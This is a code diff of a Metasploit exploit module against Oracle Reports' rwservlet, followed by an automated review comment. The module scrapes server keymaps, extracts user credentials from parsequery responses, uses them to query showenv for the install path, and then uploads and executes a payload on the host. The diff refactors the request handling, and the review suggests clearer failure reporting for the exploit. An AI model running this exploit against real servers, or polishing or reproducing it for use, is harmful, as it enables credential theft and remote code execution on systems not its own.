updated
parent
f6291eb9a8
commit
5a883a4477
|
@ -67,19 +67,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def check
|
||||||
url = datastore['RHOST']
|
res = send_request_cgi({
|
||||||
url = "http://" + url + "/reports/rwservlet/showmap"
|
'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showmap"),
|
||||||
uri = URI.parse(url)
|
'method' => 'GET'
|
||||||
begin
|
})
|
||||||
html = uri.open.read
|
|
||||||
rescue
|
unless res and res.body.include?("Reports Services")
|
||||||
return Exploit::CheckCode::Safe
|
return Exploit::CheckCode::Safe
|
||||||
end
|
end
|
||||||
if html =~ /Reports Servlet Key Map/
|
|
||||||
return Exploit::CheckCode::Appears
|
return Exploit::CheckCode::Appears
|
||||||
else
|
|
||||||
return Exploit::CheckCode::Safe
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
@ -89,28 +86,26 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
@payload_dir = datastore['PAYDIR']
|
@payload_dir = datastore['PAYDIR']
|
||||||
@local_path = ""
|
@local_path = ""
|
||||||
|
|
||||||
@url = datastore['RHOST']
|
uri = target_uri.path
|
||||||
url = "http://" + @url + "/reports/rwservlet/showmap"
|
res = send_request_cgi({
|
||||||
uri = URI.parse(url)
|
'uri' => normalize_uri(uri, "/reports/rwservlet/showmap"),
|
||||||
begin
|
'method' => 'GET'
|
||||||
html = uri.open.read
|
})
|
||||||
rescue
|
|
||||||
fail_with(Failure::Unknown, "#{peer} - target is not vulnerable or unreachable")
|
|
||||||
end
|
|
||||||
|
|
||||||
if html.include?("Reports Servlet Key Map")
|
if res and res.body.include?("Reports Services")
|
||||||
test = html.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten
|
test = res.body.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten
|
||||||
|
|
||||||
#Parse keymaps for servers
|
#Parse keymaps for servers
|
||||||
print_status "#{peer} - Enumerating keymaps ... "
|
print_status "#{peer} - Enumerating keymaps ... "
|
||||||
uri = target_uri.path
|
|
||||||
test.each do |t|
|
test.each do |t|
|
||||||
if not @hacked
|
if not @hacked
|
||||||
t = t.delete(' ')
|
t = t.delete(' ')
|
||||||
|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => normalize_uri(uri, "/reports/rwservlet/parsequery?#{t}"),
|
'uri' => normalize_uri(uri, "/reports/rwservlet/parsequery?#{t}"),
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
})
|
})
|
||||||
|
|
||||||
if res and res.code == 200
|
if res and res.code == 200
|
||||||
if res.body =~ /userid=(.*)@/
|
if res.body =~ /userid=(.*)@/
|
||||||
authid = $1
|
authid = $1
|
||||||
|
@ -161,20 +156,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
print_good "#{peer} - Found credentials: #{authid}"
|
print_good "#{peer} - Found credentials: #{authid}"
|
||||||
print_status "#{peer} - Querying showenv ..."
|
print_status "#{peer} - Querying showenv ..."
|
||||||
|
|
||||||
url = "http://" + @url + "/reports/rwservlet/showenv?server=#{server}&authid=#{authid}"
|
res = send_request_cgi({
|
||||||
uri = URI.parse(url)
|
'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showenv"),
|
||||||
begin
|
'method' => 'GET',
|
||||||
html = uri.open.read
|
'vars_get' => {
|
||||||
rescue
|
'server' => server,
|
||||||
print_status("#{peer} - Query failed")
|
'authid' => authid
|
||||||
else
|
}
|
||||||
if html =~ /\\(.*)\\showenv/
|
})
|
||||||
|
|
||||||
|
if res and res.code == 200
|
||||||
|
if res.body =~ /\\(.*)\\showenv/
|
||||||
print_good "#{peer} - Query succeeded!"
|
print_good "#{peer} - Query succeeded!"
|
||||||
print_status "#{peer} - Windows install detected "
|
print_status "#{peer} - Windows install detected "
|
||||||
print_status "#{peer} - Uploading payload ..."
|
print_status "#{peer} - Uploading payload ..."
|
||||||
@local_path = $1.gsub("\\", "/")
|
@local_path = $1.gsub("\\", "/")
|
||||||
setup_payload
|
setup_payload
|
||||||
elsif html =~ /\/(.*)\/showenv/
|
elsif res.body =~ /\/(.*)\/showenv/
|
||||||
print_good "#{peer} - Query succeeded!"
|
print_good "#{peer} - Query succeeded!"
|
||||||
print_status "#{peer} - Linux install detected"
|
print_status "#{peer} - Linux install detected"
|
||||||
print_status "#{peer} - Uploading payload ..."
|
print_status "#{peer} - Uploading payload ..."
|
||||||
|
@ -189,9 +187,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
def upload_payload
|
def upload_payload
|
||||||
path = "/#{@local_path}#{@payload_dir}#{@payload_name}"
|
path = "/#{@local_path}#{@payload_dir}#{@payload_name}"
|
||||||
|
|
||||||
uri = target_uri.path
|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => normalize_uri(uri, "/reports/rwservlet"),
|
'uri' => normalize_uri(target_uri.path, "/reports/rwservlet"),
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'encode_params' => false,
|
'encode_params' => false,
|
||||||
'vars_get' => {
|
'vars_get' => {
|
||||||
|
@ -244,6 +241,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exec_payload
|
def exec_payload
|
||||||
|
if @hacked
|
||||||
print_status("#{peer} - Our payload is at: #{peer}/reports#{@payload_dir}#{@payload_name}")
|
print_status("#{peer} - Our payload is at: #{peer}/reports#{@payload_dir}#{@payload_name}")
|
||||||
print_status("#{peer} - Executing payload...")
|
print_status("#{peer} - Executing payload...")
|
||||||
|
|
||||||
|
@ -253,3 +251,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
})
|
})
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
end
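Review bot: Wrapping the whole of exec_payload in `if @hacked` (the new line in the `@ -244,6 +241,7` hunk, closed by the `end` added in the `@ -253,3 +251,4` hunk) turns the not-uploaded case into a silent no-op: nothing is printed and the operator is never told the payload was not executed. If `@hacked` means "payload uploaded", as its use inside the keymap loop in the `@ -89,28 +86,26` hunk suggests, a guard clause that reports the failure is clearer and avoids the extra nesting, e.g. `fail_with(Failure::Unknown, "#{peer} - Payload was not uploaded, nothing to execute") unless @hacked` in place of `if @hacked`, dropping the added trailing `end`. The body of exec_payload between those two hunks is outside this diff, so where `@hacked` is set cannot be confirmed from here. The same pattern in the `@ -161,20 +156,23` hunk drops the old `Query failed` message: when the showenv request returns nil or a non-200 status, the new `if res and res.code == 200` falls through without any output, so a `print_status` on that failure path is worth restoring unless an `else` branch exists beyond the hunk.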
|
||||||
|
|